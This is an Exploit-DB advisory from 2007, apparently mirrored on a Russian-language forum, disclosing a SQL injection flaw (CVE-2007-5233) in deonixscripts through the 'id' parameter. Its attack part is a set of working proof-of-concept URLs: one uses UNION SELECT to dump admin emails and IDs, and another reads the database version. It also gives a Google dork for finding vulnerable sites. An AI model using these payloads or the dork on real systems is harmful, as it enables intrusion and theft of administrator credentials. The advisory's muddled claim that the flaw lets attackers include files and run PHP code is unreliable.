- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4482
- Проверка EDB
-
- Пройдено
- Автор
- BIUS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5233
- Дата публикации
- 2007-10-04
Код:
#############################Nyubicrew Community################################
#
# deonixscripts (id) Remote Sql Injection
#
# vendor : http://www.deonixscripts.com/
# Demo : http://www.deonixscripts.com/demo/tplmgt13/
#
#################################################################################
#
#
# Bug Found By :home_edition2001 a.k.a (bius) (31-08-2007)
#
# contact: [email protected]
#
# Website : www.solpotcrew.org/adv/home_edition2001-adv-03.txt
#
################################################################################
#
#
# Greetz: Nyubi aka solpot , Matdhule , S4M3K ,[DEVIL_MAY_CRY] , iFX , Scr3W_W0rM ,
# nakkuta , bukan-diriku , POET , Th0nk , mbako_semprul , Fungky , airsoul
# wong_edan , ^s0n_g0ku^ , aLiiF , sparta-x , dudut , xtremeshell , Bithedz
# th3sn0wbr4in , ReAksi , X8 , junkiest , K1tk4t , masboi , saritem
# x-ace , replacement_killer , LamerCrew , k1n9k0ng ,[K]ompoR_Meledu[K]
# and all member #nyubicrew @ irc.mildnet.org
# especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "id" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by Remote Sql Injection
P.O.C :
http://localhost/index.php?action=readmore&id=-1%20union%20select%200,1,concat(email,0x3a,userid,0x3a,adminid),3%20from%20admin/*
http://localhost/index.php?action=readmore&id=-1%20union%20select%200,1,@@version,3/*
Google Dork : Powered by: deonixscripts.com
######################MY Special Girl JUST FOR U Ula#########################
######################################E.O.F##################################
# milw0rm.com [2007-10-04]- Источник
- www.exploit-db.com
